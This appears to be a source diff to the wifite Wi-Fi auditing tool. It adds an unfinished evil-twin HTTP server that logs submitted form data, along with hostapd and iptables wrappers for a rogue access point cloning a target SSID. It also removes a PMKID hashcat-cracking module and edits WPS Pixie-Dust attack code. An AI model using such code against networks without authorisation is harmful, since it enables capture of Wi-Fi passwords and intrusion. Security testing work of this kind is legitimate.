@@ -0,0 +1,84 @@
|
|||||||
|
#!/usr/bin/python2.7
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
|
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
|
||||||
|
from threading import Thread
|
||||||
|
|
||||||
|
class EviltwinServer(HTTPServer, object):
|
||||||
|
|
||||||
|
def __init__(self, success_callback, error_callback, port=80):
|
||||||
|
self.thread = None
|
||||||
|
# Store state in server
|
||||||
|
self.success_callback = success_callback
|
||||||
|
self.error_callback = error_callback
|
||||||
|
self.request_count = 0
|
||||||
|
self.router_pages_served = 0
|
||||||
|
# Initialize with our request handler
|
||||||
|
super(EviltwinServer, self).__init__(('', port), EviltwinRequestHandler)
|
||||||
|
|
||||||
|
def start(self):
|
||||||
|
self.thread = Thread(target=self.serve_forever)
|
||||||
|
self.thread.start()
|
||||||
|
|
||||||
|
def stop(self):
|
||||||
|
# From https://stackoverflow.com/a/268686
|
||||||
|
self.shutdown()
|
||||||
|
self.socket.close()
|
||||||
|
|
||||||
|
if self.thread:
|
||||||
|
self.thread.join()
|
||||||
|
|
||||||
|
def request_count(self):
|
||||||
|
return self.request_count
|
||||||
|
|
||||||
|
def router_pages_served(self):
|
||||||
|
return self.router_pages_served
|
||||||
|
|
||||||
|
|
||||||
|
class EviltwinRequestHandler(BaseHTTPRequestHandler):
|
||||||
|
|
||||||
|
def do_GET(self):
|
||||||
|
self.server.request_count += 1
|
||||||
|
request_path = self.path
|
||||||
|
|
||||||
|
# TODO: URL mappings to load specific pages. E.g. Apple/Android "pings"
|
||||||
|
|
||||||
|
print('\n----- Request Start ----->\n')
|
||||||
|
print(request_path)
|
||||||
|
print(self.headers)
|
||||||
|
print('<----- Request End -----\n')
|
||||||
|
|
||||||
|
self.send_response(200)
|
||||||
|
self.send_header('Content-type', 'text/html')
|
||||||
|
self.end_headers()
|
||||||
|
self.wfile.write('<html><head><title>Title goes here.</title></head>')
|
||||||
|
self.wfile.write('<body><p>This is a test.</p>')
|
||||||
|
# If someone went to 'http://something.somewhere.net/foo/bar/',
|
||||||
|
# then s.path equals '/foo/bar/'.
|
||||||
|
self.wfile.write('<p>You accessed path: %s</p>' % self.path)
|
||||||
|
self.wfile.write('</body></html>')
|
||||||
|
|
||||||
|
|
||||||
|
def do_POST(self):
|
||||||
|
self.server.request_count += 1
|
||||||
|
request_path = self.path
|
||||||
|
|
||||||
|
# TODO: If path includes router password, call self.server.success_callback
|
||||||
|
# TODO: Verify router passwords via separate interface?
|
||||||
|
|
||||||
|
print('\n----- Request Start ----->\n')
|
||||||
|
print(request_path)
|
||||||
|
|
||||||
|
request_headers = self.headers
|
||||||
|
content_length = request_headers.getheaders('content-length')
|
||||||
|
length = int(content_length[0]) if content_length else 0
|
||||||
|
|
||||||
|
print(request_headers)
|
||||||
|
print(self.rfile.read(length))
|
||||||
|
print('<----- Request End -----\n')
|
||||||
|
|
||||||
|
self.send_response(200)
|
||||||
|
|
||||||
|
do_PUT = do_POST
|
||||||
|
do_DELETE = do_GET
|
||||||
|
|
||||||
@@ -1,134 +0,0 @@
|
|||||||
#!/usr/bin/env python
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from .dependency import Dependency
|
|
||||||
from ..config import Configuration
|
|
||||||
from ..util.process import Process
|
|
||||||
from ..util.color import Color
|
|
||||||
|
|
||||||
import os
|
|
||||||
|
|
||||||
|
|
||||||
class Hashcat(Dependency):
|
|
||||||
dependency_required = False
|
|
||||||
dependency_name = 'hashcat'
|
|
||||||
dependency_url = 'https://hashcat.net/hashcat/'
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def crack_pmkid(pmkid_file, verbose=False):
|
|
||||||
'''
|
|
||||||
Cracks a given pmkid_file using the PMKID/WPA2 attack (-m 16800)
|
|
||||||
Returns:
|
|
||||||
Key (str) if found; `None` if not found.
|
|
||||||
'''
|
|
||||||
|
|
||||||
# Run hashcat once normally, then with --show if it failed
|
|
||||||
# To catch cases where the password is already in the pot file.
|
|
||||||
for additional_arg in [ [], ['--show']]:
|
|
||||||
command = [
|
|
||||||
'hashcat',
|
|
||||||
'--force',
|
|
||||||
'--quiet', # Only output the password if found.
|
|
||||||
'-m', '16800', # WPA-PMKID-PBKDF2
|
|
||||||
'-a', '0', # TODO: Configure
|
|
||||||
'-w', '2', # TODO: Configure
|
|
||||||
pmkid_file,
|
|
||||||
Configuration.wordlist
|
|
||||||
]
|
|
||||||
command.extend(additional_arg)
|
|
||||||
if verbose and additional_arg == []:
|
|
||||||
Color.pl('{+} {D}Running: {W}{P}%s{W}' % ' '.join(command))
|
|
||||||
|
|
||||||
# TODO: Check status of hashcat (%); it's impossible with --quiet
|
|
||||||
|
|
||||||
try:
|
|
||||||
hashcat_proc = Process(command)
|
|
||||||
hashcat_proc.wait()
|
|
||||||
stdout = hashcat_proc.stdout()
|
|
||||||
except KeyboardInterrupt: # In case user gets impatient
|
|
||||||
Color.pl('\n{!} {O}Interrupted hashcat cracking{W}')
|
|
||||||
stdout = ''
|
|
||||||
|
|
||||||
if ':' not in stdout:
|
|
||||||
# Failed
|
|
||||||
continue
|
|
||||||
else:
|
|
||||||
# Cracked
|
|
||||||
key = stdout.strip().split(':', 1)[1]
|
|
||||||
return key
|
|
||||||
|
|
||||||
|
|
||||||
class HcxDumpTool(Dependency):
|
|
||||||
dependency_required = False
|
|
||||||
dependency_name = 'hcxdumptool'
|
|
||||||
dependency_url = 'https://github.com/ZerBea/hcxdumptool'
|
|
||||||
|
|
||||||
def __init__(self, target, pcapng_file):
|
|
||||||
# Create filterlist
|
|
||||||
filterlist = Configuration.temp('pmkid.filterlist')
|
|
||||||
with open(filterlist, 'w') as filter_handle:
|
|
||||||
filter_handle.write(target.bssid.replace(':', ''))
|
|
||||||
|
|
||||||
if os.path.exists(pcapng_file):
|
|
||||||
os.remove(pcapng_file)
|
|
||||||
|
|
||||||
command = [
|
|
||||||
'hcxdumptool',
|
|
||||||
'-i', Configuration.interface,
|
|
||||||
'--filterlist', filterlist,
|
|
||||||
'--filtermode', '2',
|
|
||||||
'-c', str(target.channel),
|
|
||||||
'-o', pcapng_file
|
|
||||||
]
|
|
||||||
|
|
||||||
self.proc = Process(command)
|
|
||||||
|
|
||||||
def poll(self):
|
|
||||||
return self.proc.poll()
|
|
||||||
|
|
||||||
def interrupt(self):
|
|
||||||
self.proc.interrupt()
|
|
||||||
|
|
||||||
|
|
||||||
class HcxPcapTool(Dependency):
|
|
||||||
dependency_required = False
|
|
||||||
dependency_name = 'hcxpcaptool'
|
|
||||||
dependency_url = 'https://github.com/ZerBea/hcxtools'
|
|
||||||
|
|
||||||
def __init__(self, target):
|
|
||||||
self.target = target
|
|
||||||
self.bssid = self.target.bssid.lower().replace(':', '')
|
|
||||||
self.pmkid_file = Configuration.temp('pmkid-%s.16800' % self.bssid)
|
|
||||||
|
|
||||||
def get_pmkid_hash(self, pcapng_file):
|
|
||||||
if os.path.exists(self.pmkid_file):
|
|
||||||
os.remove(self.pmkid_file)
|
|
||||||
|
|
||||||
command = [
|
|
||||||
'hcxpcaptool',
|
|
||||||
'-z', self.pmkid_file,
|
|
||||||
pcapng_file
|
|
||||||
]
|
|
||||||
hcxpcap_proc = Process(command)
|
|
||||||
hcxpcap_proc.wait()
|
|
||||||
|
|
||||||
if not os.path.exists(self.pmkid_file):
|
|
||||||
return None
|
|
||||||
|
|
||||||
with open(self.pmkid_file, 'r') as f:
|
|
||||||
output = f.read()
|
|
||||||
# Each line looks like:
|
|
||||||
# hash*bssid*station*essid
|
|
||||||
|
|
||||||
# Note: The dumptool will record *anything* it finds, ignoring the filterlist.
|
|
||||||
# Check that we got the right target (filter by BSSID)
|
|
||||||
matching_pmkid_hash = None
|
|
||||||
for line in output.split('\n'):
|
|
||||||
fields = line.split('*')
|
|
||||||
if len(fields) >= 3 and fields[1].lower() == self.bssid:
|
|
||||||
# Found it
|
|
||||||
matching_pmkid_hash = line
|
|
||||||
break
|
|
||||||
|
|
||||||
os.remove(self.pmkid_file)
|
|
||||||
return matching_pmkid_hash
|
|
||||||
94
wifite/tools/hostapd.py
Executable file
94
wifite/tools/hostapd.py
Executable file
@@ -0,0 +1,94 @@
|
|||||||
|
#!/usr/bin/python2.7
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
|
import re
|
||||||
|
import os
|
||||||
|
|
||||||
|
from .dependency import Dependency
|
||||||
|
from ..config import Configuration
|
||||||
|
from ..util.process import Process
|
||||||
|
|
||||||
|
class Hostapd(Dependency):
|
||||||
|
process_name = 'hostapd'
|
||||||
|
|
||||||
|
dependency_required = False
|
||||||
|
dependency_name = process_name
|
||||||
|
dependency_url = 'apt-get install hostapd'
|
||||||
|
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def exists(cls):
|
||||||
|
return Process.exists(cls.process_name)
|
||||||
|
|
||||||
|
|
||||||
|
def __init__(self, target, interface):
|
||||||
|
self.target = target
|
||||||
|
self.interface = interface
|
||||||
|
self.pid = None
|
||||||
|
self.config_file = None
|
||||||
|
self.output_file = None
|
||||||
|
self.output_write = None
|
||||||
|
self.state = 'Initializing'
|
||||||
|
|
||||||
|
|
||||||
|
def create_config_file(self):
|
||||||
|
if not self.target.essid_known:
|
||||||
|
self.state = 'Error: Target ESSID is not known'
|
||||||
|
raise Exception('Cannot start hostapd if target has unknown SSID')
|
||||||
|
|
||||||
|
self.config_file = os.path.abspath(os.path.join(Configuration.temp(), 'hostapd.conf'))
|
||||||
|
|
||||||
|
with open(self.config_file, 'w') as config:
|
||||||
|
config.write('driver=nl80211\n')
|
||||||
|
config.write('ssid={}\n'.format(self.target.essid))
|
||||||
|
# TODO: support 5ghz
|
||||||
|
config.write('hw_mode=g\n')
|
||||||
|
config.write('channel={}\n'.format(self.target.channel))
|
||||||
|
config.write('logger_syslog=-1\n')
|
||||||
|
config.write('logger_syslog_level=2\n')
|
||||||
|
|
||||||
|
|
||||||
|
def start(self):
|
||||||
|
self.create_config_file()
|
||||||
|
|
||||||
|
self.killall()
|
||||||
|
|
||||||
|
temp = Configuration.temp()
|
||||||
|
self.output_file = os.path.abspath(os.path.join(temp, 'hostapd.out'))
|
||||||
|
self.output_write = open(self.output_file, 'a')
|
||||||
|
|
||||||
|
command = [
|
||||||
|
self.process_name,
|
||||||
|
'-i', self.interface,
|
||||||
|
self.config_file
|
||||||
|
]
|
||||||
|
|
||||||
|
self.pid = Process(command, stdout=self.output_write, cwd=temp)
|
||||||
|
|
||||||
|
|
||||||
|
def stop(self):
|
||||||
|
if self.pid and self.pid.poll() is not None:
|
||||||
|
self.pid.interrupt()
|
||||||
|
|
||||||
|
self.killall()
|
||||||
|
# TODO: Wait until hostapd is completely stopped.
|
||||||
|
|
||||||
|
if self.output_write:
|
||||||
|
self.output_write.close()
|
||||||
|
|
||||||
|
if self.config_file and os.path.exists(self.config_file):
|
||||||
|
os.remove(self.config_file)
|
||||||
|
|
||||||
|
if self.output_file and os.path.exists(self.output_file):
|
||||||
|
os.remove(self.output_file)
|
||||||
|
|
||||||
|
|
||||||
|
def killall(self):
|
||||||
|
Process(['killall', self.process_name]).wait()
|
||||||
|
|
||||||
|
|
||||||
|
def check(self):
|
||||||
|
if self.pid.poll() is not None:
|
||||||
|
raise Exception('hostapd stopped running, exit code: %d, output: %s' % (self.pid.poll(), self.pid.stdout()))
|
||||||
|
# TODO: Check hostapd logs / output for any problems.
|
||||||
|
|
||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
import re
|
import re
|
||||||
|
|||||||
73
wifite/tools/iptables.py
Normal file
73
wifite/tools/iptables.py
Normal file
@@ -0,0 +1,73 @@
|
|||||||
|
#!/usr/bin/python2.7
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
|
import re
|
||||||
|
|
||||||
|
from .dependency import Dependency
|
||||||
|
from ..util.process import Process
|
||||||
|
|
||||||
|
class Iptables(Dependency):
|
||||||
|
|
||||||
|
process_name = 'iptables'
|
||||||
|
|
||||||
|
dependency_required = False
|
||||||
|
dependency_name = process_name
|
||||||
|
dependency_url = 'apt-get install iptables'
|
||||||
|
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def exists(cls):
|
||||||
|
return Process.exists(cls.process_name)
|
||||||
|
|
||||||
|
|
||||||
|
@classmethod
|
||||||
|
def __exec(cls, args, expect_return_code=0):
|
||||||
|
# Helper method for executing iptables commands.
|
||||||
|
|
||||||
|
if type(args) is str:
|
||||||
|
args = args.split(' ')
|
||||||
|
|
||||||
|
command = [cls.process_name] + args
|
||||||
|
|
||||||
|
pid = Process(command)
|
||||||
|
pid.wait()
|
||||||
|
if expect_return_code and pid.poll() != 0:
|
||||||
|
raise Exception('Error executing %s:\n%s\n%s' % (' '.join(command), pid.stdout(), pid.stderr()))
|
||||||
|
|
||||||
|
|
||||||
|
# -N, --new-chain <chain>
|
||||||
|
@classmethod
|
||||||
|
def new_chain(cls, chain_name, table):
|
||||||
|
args = ['-N', chain_name, '-t', table]
|
||||||
|
cls.__exec(args)
|
||||||
|
|
||||||
|
# -A, --append <chain> <rule-specification>
|
||||||
|
@classmethod
|
||||||
|
def append(cls, chain, table=None, rules=[]):
|
||||||
|
args = []
|
||||||
|
if table is not None:
|
||||||
|
args.extend(['-t', table])
|
||||||
|
args.extend(['-A', chain])
|
||||||
|
args.extend(rules)
|
||||||
|
cls.__exec(args)
|
||||||
|
|
||||||
|
|
||||||
|
# -F, --flush <chain>
|
||||||
|
@classmethod
|
||||||
|
def flush(cls, table=None):
|
||||||
|
args = []
|
||||||
|
if table is not None:
|
||||||
|
args.extend(['-t', table])
|
||||||
|
args.append('-F')
|
||||||
|
cls.__exec(args)
|
||||||
|
|
||||||
|
|
||||||
|
# -X, --delete-chain <chain>
|
||||||
|
@classmethod
|
||||||
|
def delete_chain(cls, table=None):
|
||||||
|
args = []
|
||||||
|
if table is not None:
|
||||||
|
args.extend(['-t', table])
|
||||||
|
args.append('-X')
|
||||||
|
cls.__exec(args)
|
||||||
|
|
||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from .dependency import Dependency
|
from .dependency import Dependency
|
||||||
@@ -29,7 +29,6 @@ class Iwconfig(Dependency):
|
|||||||
from ..util.process import Process
|
from ..util.process import Process
|
||||||
|
|
||||||
interfaces = set()
|
interfaces = set()
|
||||||
iface = ''
|
|
||||||
|
|
||||||
(out, err) = Process.call('iwconfig')
|
(out, err) = Process.call('iwconfig')
|
||||||
for line in out.split('\n'):
|
for line in out.split('\n'):
|
||||||
@@ -38,16 +37,11 @@ class Iwconfig(Dependency):
|
|||||||
if not line.startswith(' '):
|
if not line.startswith(' '):
|
||||||
iface = line.split(' ')[0]
|
iface = line.split(' ')[0]
|
||||||
if '\t' in iface:
|
if '\t' in iface:
|
||||||
iface = iface.split('\t')[0].strip()
|
iface = iface.split('\t')[0]
|
||||||
|
|
||||||
iface = iface.strip()
|
|
||||||
if len(iface) == 0:
|
|
||||||
continue
|
|
||||||
|
|
||||||
if mode is None:
|
if mode is None:
|
||||||
interfaces.add(iface)
|
interfaces.add(iface)
|
||||||
|
|
||||||
if mode is not None and 'Mode:{}'.format(mode) in line and len(iface) > 0:
|
if mode is not None and 'mode:{}'.format(mode.lower()) in line.lower():
|
||||||
interfaces.add(iface)
|
interfaces.add(iface)
|
||||||
|
|
||||||
return list(interfaces)
|
return list(interfaces)
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from .dependency import Dependency
|
from .dependency import Dependency
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from .dependency import Dependency
|
from .dependency import Dependency
|
||||||
@@ -56,7 +56,7 @@ class Pyrit(Dependency):
|
|||||||
|
|
||||||
elif current_bssid is not None and current_essid is not None:
|
elif current_bssid is not None and current_essid is not None:
|
||||||
# We hit an AP that we care about.
|
# We hit an AP that we care about.
|
||||||
# Line does not contain AccessPoint, see if it's 'good'
|
# Line does not contain AccessPoint, see if it's "good"
|
||||||
if ', good' in line:
|
if ', good' in line:
|
||||||
bssid_essid_pairs.add( (current_bssid, current_essid) )
|
bssid_essid_pairs.add( (current_bssid, current_essid) )
|
||||||
|
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from .dependency import Dependency
|
from .dependency import Dependency
|
||||||
@@ -81,7 +81,7 @@ class Reaver(Attack, Dependency):
|
|||||||
output_file_prefix='pixie') as airodump:
|
output_file_prefix='pixie') as airodump:
|
||||||
|
|
||||||
# Wait for target
|
# Wait for target
|
||||||
self.pattack('Waiting for target to appear...')
|
self.pattack("Waiting for target to appear...")
|
||||||
self.target = self.wait_for_target(airodump)
|
self.target = self.wait_for_target(airodump)
|
||||||
|
|
||||||
# Start reaver
|
# Start reaver
|
||||||
@@ -125,13 +125,13 @@ class Reaver(Attack, Dependency):
|
|||||||
|
|
||||||
meta_statuses = []
|
meta_statuses = []
|
||||||
if self.total_timeouts > 0:
|
if self.total_timeouts > 0:
|
||||||
meta_statuses.append('{O}Timeouts:%d{W}' % self.total_timeouts)
|
meta_statuses.append("{O}Timeouts:%d{W}" % self.total_timeouts)
|
||||||
|
|
||||||
if self.total_wpsfails > 0:
|
if self.total_wpsfails > 0:
|
||||||
meta_statuses.append('{O}WPSFail:%d{W}' % self.total_wpsfails)
|
meta_statuses.append("{O}WPSFail:%d{W}" % self.total_wpsfails)
|
||||||
|
|
||||||
if self.locked:
|
if self.locked:
|
||||||
meta_statuses.append('{R}Locked{W}')
|
meta_statuses.append("{R}Locked{W}")
|
||||||
|
|
||||||
if len(meta_statuses) > 0:
|
if len(meta_statuses) > 0:
|
||||||
main_status += ' (%s)' % ', '.join(meta_statuses)
|
main_status += ' (%s)' % ', '.join(meta_statuses)
|
||||||
@@ -157,13 +157,9 @@ class Reaver(Attack, Dependency):
|
|||||||
|
|
||||||
# Try to derive PSK from PIN using Bully
|
# Try to derive PSK from PIN using Bully
|
||||||
self.pattack('{W}Retrieving PSK using {C}bully{W}...')
|
self.pattack('{W}Retrieving PSK using {C}bully{W}...')
|
||||||
psk = None
|
|
||||||
try:
|
|
||||||
psk = Bully.get_psk_from_pin(self.target, pin)
|
psk = Bully.get_psk_from_pin(self.target, pin)
|
||||||
except KeyboardInterrupt:
|
|
||||||
pass
|
|
||||||
if psk is None:
|
if psk is None:
|
||||||
Color.pl('')
|
Color.pl("")
|
||||||
self.pattack('{R}Failed {O}to get PSK using bully', newline=True)
|
self.pattack('{R}Failed {O}to get PSK using bully', newline=True)
|
||||||
else:
|
else:
|
||||||
self.pattack('{G}Cracked WPS PSK: {C}%s' % psk, newline=True)
|
self.pattack('{G}Cracked WPS PSK: {C}%s' % psk, newline=True)
|
||||||
@@ -235,12 +231,12 @@ class Reaver(Attack, Dependency):
|
|||||||
time_left = Configuration.wps_pixie_timeout - self.running_time()
|
time_left = Configuration.wps_pixie_timeout - self.running_time()
|
||||||
|
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
Color.pattack('WPS',
|
Color.pattack("WPS",
|
||||||
self.target,
|
self.target,
|
||||||
'Pixie-Dust',
|
'Pixie-Dust',
|
||||||
'{W}[{C}%s{W}] %s' % (Timer.secs_to_str(time_left), message))
|
'{W}[{C}%s{W}] %s' % (Timer.secs_to_str(time_left), message))
|
||||||
if newline:
|
if newline:
|
||||||
Color.pl('')
|
Color.pl("")
|
||||||
|
|
||||||
|
|
||||||
def running_time(self):
|
def running_time(self):
|
||||||
@@ -260,19 +256,19 @@ class Reaver(Attack, Dependency):
|
|||||||
|
|
||||||
# Check for PSK.
|
# Check for PSK.
|
||||||
# Note: Reaver 1.6.x does not appear to return PSK (?)
|
# Note: Reaver 1.6.x does not appear to return PSK (?)
|
||||||
regex = re.search(r"WPA PSK: *'(.+)'", stdout)
|
regex = re.search("WPA PSK: *'(.+)'", stdout)
|
||||||
if regex:
|
if regex:
|
||||||
psk = regex.group(1)
|
psk = regex.group(1)
|
||||||
|
|
||||||
# Check for SSID
|
# Check for SSID
|
||||||
'''1.x [Reaver Test] [+] AP SSID: 'Test Router' '''
|
"""1.x [Reaver Test] [+] AP SSID: 'Test Router' """
|
||||||
regex = re.search(r"AP SSID:\s*'(.*)'", stdout)
|
regex = re.search(r"AP SSID:\s*'(.*)'", stdout)
|
||||||
if regex:
|
if regex:
|
||||||
ssid = regex.group(1)
|
ssid = regex.group(1)
|
||||||
|
|
||||||
# Check (again) for SSID
|
# Check (again) for SSID
|
||||||
if ssid is None:
|
if ssid is None:
|
||||||
'''1.6.x [+] Associated with EC:1A:59:37:70:0E (ESSID: belkin.00e)'''
|
"""1.6.x [+] Associated with EC:1A:59:37:70:0E (ESSID: belkin.00e)"""
|
||||||
regex = re.search(r"Associated with [0-9A-F:]+ \(ESSID: (.*)\)", stdout)
|
regex = re.search(r"Associated with [0-9A-F:]+ \(ESSID: (.*)\)", stdout)
|
||||||
if regex:
|
if regex:
|
||||||
ssid = regex.group(1)
|
ssid = regex.group(1)
|
||||||
@@ -353,15 +349,15 @@ executing pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1ba
|
|||||||
(pin, psk, ssid) = Reaver.get_pin_psk_ssid(old_stdout)
|
(pin, psk, ssid) = Reaver.get_pin_psk_ssid(old_stdout)
|
||||||
assert pin == '12345678', 'pin was "%s", should have been "12345678"' % pin
|
assert pin == '12345678', 'pin was "%s", should have been "12345678"' % pin
|
||||||
assert psk == 'Test PSK', 'psk was "%s", should have been "Test PSK"' % psk
|
assert psk == 'Test PSK', 'psk was "%s", should have been "Test PSK"' % psk
|
||||||
assert ssid == 'Test Router', 'ssid was %s, should have been Test Router' % repr(ssid)
|
assert ssid == "Test Router", 'ssid was %s, should have been Test Router' % repr(ssid)
|
||||||
result = CrackResultWPS('AA:BB:CC:DD:EE:FF', ssid, pin, psk)
|
result = CrackResultWPS('AA:BB:CC:DD:EE:FF', ssid, pin, psk)
|
||||||
result.dump()
|
result.dump()
|
||||||
|
|
||||||
print('')
|
print("")
|
||||||
|
|
||||||
(pin, psk, ssid) = Reaver.get_pin_psk_ssid(new_stdout)
|
(pin, psk, ssid) = Reaver.get_pin_psk_ssid(new_stdout)
|
||||||
assert pin == '11867722', 'pin was "%s", should have been "11867722"' % pin
|
assert pin == '11867722', 'pin was "%s", should have been "11867722"' % pin
|
||||||
assert psk == None, 'psk was "%s", should have been "None"' % psk
|
assert psk == None, 'psk was "%s", should have been "None"' % psk
|
||||||
assert ssid == 'belkin.00e', 'ssid was "%s", should have been "belkin.00e"' % repr(ssid)
|
assert ssid == "belkin.00e", 'ssid was "%s", should have been "belkin.00e"' % repr(ssid)
|
||||||
result = CrackResultWPS('AA:BB:CC:DD:EE:FF', ssid, pin, psk)
|
result = CrackResultWPS('AA:BB:CC:DD:EE:FF', ssid, pin, psk)
|
||||||
result.dump()
|
result.dump()
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from .dependency import Dependency
|
from .dependency import Dependency
|
||||||
@@ -20,7 +20,7 @@ class Tshark(Dependency):
|
|||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def _extract_src_dst_index_total(line):
|
def _extract_src_dst_index_total(line):
|
||||||
# Extract BSSIDs, handshake # (1-4) and handshake 'total' (4)
|
# Extract BSSIDs, handshake # (1-4) and handshake "total" (4)
|
||||||
mac_regex = ('[a-zA-Z0-9]{2}:' * 6)[:-1]
|
mac_regex = ('[a-zA-Z0-9]{2}:' * 6)[:-1]
|
||||||
match = re.search('(%s)\s*.*\s*(%s).*Message.*(\d).*of.*(\d)' % (mac_regex, mac_regex), line)
|
match = re.search('(%s)\s*.*\s*(%s).*Message.*(\d).*of.*(\d)' % (mac_regex, mac_regex), line)
|
||||||
if match is None:
|
if match is None:
|
||||||
@@ -135,7 +135,7 @@ class Tshark(Dependency):
|
|||||||
|
|
||||||
(src, dst, essid) = match.groups()
|
(src, dst, essid) = match.groups()
|
||||||
|
|
||||||
if dst.lower() == 'ff:ff:ff:ff:ff:ff':
|
if dst.lower() == "ff:ff:ff:ff:ff:ff":
|
||||||
continue # Skip broadcast packets
|
continue # Skip broadcast packets
|
||||||
|
|
||||||
if bssid is not None:
|
if bssid is not None:
|
||||||
@@ -161,7 +161,7 @@ class Tshark(Dependency):
|
|||||||
'''
|
'''
|
||||||
|
|
||||||
if not Tshark.exists():
|
if not Tshark.exists():
|
||||||
raise ValueError('Cannot detect WPS networks: Tshark does not exist')
|
raise Exception('Cannot detect WPS networks: Tshark does not exist')
|
||||||
|
|
||||||
command = [
|
command = [
|
||||||
'tshark',
|
'tshark',
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from .dependency import Dependency
|
from .dependency import Dependency
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
@@ -33,7 +33,7 @@ class Color(object):
|
|||||||
'''
|
'''
|
||||||
Prints text using colored format on same line.
|
Prints text using colored format on same line.
|
||||||
Example:
|
Example:
|
||||||
Color.p('{R}This text is red. {W} This text is white')
|
Color.p("{R}This text is red. {W} This text is white")
|
||||||
'''
|
'''
|
||||||
sys.stdout.write(Color.s(text))
|
sys.stdout.write(Color.s(text))
|
||||||
sys.stdout.flush()
|
sys.stdout.flush()
|
||||||
@@ -62,7 +62,7 @@ class Color(object):
|
|||||||
for (key,value) in Color.replacements.items():
|
for (key,value) in Color.replacements.items():
|
||||||
output = output.replace(key, value)
|
output = output.replace(key, value)
|
||||||
for (key,value) in Color.colors.items():
|
for (key,value) in Color.colors.items():
|
||||||
output = output.replace('{%s}' % key, value)
|
output = output.replace("{%s}" % key, value)
|
||||||
return output
|
return output
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
@@ -76,8 +76,7 @@ class Color(object):
|
|||||||
def clear_entire_line():
|
def clear_entire_line():
|
||||||
import os
|
import os
|
||||||
(rows, columns) = os.popen('stty size', 'r').read().split()
|
(rows, columns) = os.popen('stty size', 'r').read().split()
|
||||||
Color.p('\r' + (' ' * int(columns)) + '\r')
|
Color.p("\r" + (" " * int(columns)) + "\r")
|
||||||
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def pattack(attack_type, target, attack_name, progress):
|
def pattack(attack_type, target, attack_name, progress):
|
||||||
@@ -87,31 +86,13 @@ class Color(object):
|
|||||||
ESSID (Pwr) Attack_Type: Progress
|
ESSID (Pwr) Attack_Type: Progress
|
||||||
e.g.: Router2G (23db) WEP replay attack: 102 IVs
|
e.g.: Router2G (23db) WEP replay attack: 102 IVs
|
||||||
'''
|
'''
|
||||||
essid = '{C}%s{W}' % target.essid if target.essid_known else '{O}unknown{W}'
|
essid = "{C}%s{W}" % target.essid if target.essid_known else "{O}unknown{W}"
|
||||||
Color.p('\r{+} {G}%s{W} ({C}%sdb{W}) {G}%s {C}%s{W}: %s ' % (
|
Color.p("\r{+} {G}%s{W} ({C}%sdb{W}) {G}%s {C}%s{W}: %s " % (
|
||||||
essid, target.power, attack_type, attack_name, progress))
|
essid, target.power, attack_type, attack_name, progress))
|
||||||
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def pexception(exception):
|
|
||||||
'''Prints an exception. Includes stack trace if necessary.'''
|
|
||||||
Color.pl('\n{!} {R}Error: {O}%s' % str(exception))
|
|
||||||
|
|
||||||
from ..config import Configuration
|
|
||||||
if Configuration.verbose > 0 or Configuration.print_stack_traces:
|
|
||||||
Color.pl('\n{!} {O}Full stack trace below')
|
|
||||||
from traceback import format_exc
|
|
||||||
Color.p('\n{!} ')
|
|
||||||
err = format_exc().strip()
|
|
||||||
err = err.replace('\n', '\n{!} {C} ')
|
|
||||||
err = err.replace(' File', '{W}File')
|
|
||||||
err = err.replace(' Exception: ', '{R}Exception: {O}')
|
|
||||||
Color.pl(err)
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
Color.pl('{R}Testing{G}One{C}Two{P}Three{W}Done')
|
Color.pl("{R}Testing{G}One{C}Two{P}Three{W}Done")
|
||||||
print(Color.s('{C}Testing{P}String{W}'))
|
print(Color.s("{C}Testing{P}String{W}"))
|
||||||
Color.pl('{+} Good line')
|
Color.pl("{+} Good line")
|
||||||
Color.pl('{!} Danger')
|
Color.pl("{!} Danger")
|
||||||
|
|
||||||
|
|||||||
@@ -1,217 +1,136 @@
|
|||||||
